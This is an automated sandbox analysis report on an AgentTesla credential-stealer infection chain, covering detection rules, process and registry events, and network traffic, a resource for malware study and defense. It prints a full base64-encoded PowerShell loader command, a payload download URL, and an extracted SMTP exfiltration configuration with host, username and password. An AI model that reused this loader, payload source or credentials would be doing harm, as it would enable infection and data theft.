Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1677af:$b2: ::FromBase64String( 0xd8576:$s1: -join 0xe5f07:$s1: -join 0xeb4fd:$s1: -join 0x1c4a14:$s1: -join 0x414a:$s3: reverse 0x58ce:$s3: reverse 0x5b99:$s3: reverse 0x62b5:$s3: reverse 0x8a4e:$s3: reverse 0x8e68:$s3: reverse 0x9648:$s3: reverse 0x9e01:$s3: reverse 0xd4b9:$s3: reverse 0xe166:$s3: reverse 0x30581:$s3: REVERSE 0x309d6:$s3: REVERSE 0x30cda:$s3: REVERSE 0x310a4:$s3: REVERSE 0x3110a:$s3: REVERSE 0x3248c:$s3: Reverse
Process Memory Space: InstallUtil.exe PID: 7752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7752	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.Nwjbuywyew.vbs.exe.59a5788.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
13.2.Nwjbuywyew.vbs.exe.66353e8.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.Nwjbuywyew.vbs.exe.49ebd40.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.Nwjbuywyew.vbs.exe.567bd38.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.DOCUMENTS.vbs.exe.8e80000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32337:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x323a9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32433:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x324c5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3252f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x325a1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32637:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x326c7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32337:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x323a9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32433:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x324c5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3252f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x325a1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32637:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x326c7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34137:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x341a9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34233:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x342c5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3432f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x343a1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34437:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x344c7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34137:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f557:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x341a9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f5c9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34233:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f653:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x342c5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f6e5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3432f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f74f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x343a1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7c1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34437:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f857:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x344c7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f8e7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.DOCUMENTS.vbs.exe.4c9e264.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34137:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f557:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x341a9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f5c9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34233:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f653:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x342c5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f6e5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3432f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f74f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x343a1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7c1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34437:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f857:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x344c7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f8e7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==, CommandLine: "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgA

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", ProcessId: 7636, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DOCUMENTS.vbs.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nwjbuywyew

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\DOCUMENTS.vbs.exe, ProcessId: 7804, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1kdxc0y.ffv.ps1

Sigma detected: PowerShell Script Run in AppData

Source: Process started

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1152, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y, ProcessId: 1344, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1152, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y, ProcessId: 7712, ProcessName: cmd.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 173.254.28.210, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 8116, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs", ProcessId: 7636, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.topcats.com", "Username": "simon@topcats.com", "Password": "SpurS21?"}

Multi AV Scanner detection for submitted file

Source: DOCUMENTS.vbs

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49714 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1624988999.0000000009220000.00000004.08000000.00040000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.0000000006465000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.00000000057D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1624988999.0000000009220000.00000004.08000000.00040000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.0000000006465000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.00000000057D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: DOCUMENTS.vbs.exe, 00000004.00000000.1419779727.0000000000111000.00000020.00000001.01000000.00000005.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000000.1712110683.0000000000FA8000.00000020.00000001.01000000.00000008.sdmp, Nwjbuywyew.vbs.exe.11.dr, DOCUMENTS.vbs.exe.2.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: DOCUMENTS.vbs.exe, 00000004.00000000.1419779727.0000000000111000.00000020.00000001.01000000.00000005.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000000.1712110683.0000000000FA8000.00000020.00000001.01000000.00000008.sdmp, Nwjbuywyew.vbs.exe.11.dr, DOCUMENTS.vbs.exe.2.dr

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F0C930h	4_2_08F0C870
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F0C930h	4_2_08F0C878
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F04DF4h	4_2_08F04D90
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F04DF4h	4_2_08F04D81
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F0C930h	4_2_08F0C948
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F1224Ah	4_2_08F121E0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F1224Ah	4_2_08F121D1
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_08F11290
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_08F11294
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_08F11298
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_08F11251
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	4_2_08F11249
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F1224Ah	4_2_08F124CC
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then jmp 08F1224Ah	4_2_08F1243D
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_0906D470
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then jmp 09741B92h	13_2_09741B28
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then jmp 09741B92h	13_2_09741B19
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	13_2_09740BE0
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	13_2_09740BD8
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	13_2_09740BDB
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then jmp 09741B92h	13_2_09741D7F
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then jmp 09741B92h	13_2_09741E14
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	13_2_0996D470

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.49ebd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Nwjbuywyew.vbs.exe.567bd38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.4c9e264.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.8:49709 -> 173.254.28.210:587

Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 173.254.28.210 173.254.28.210

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
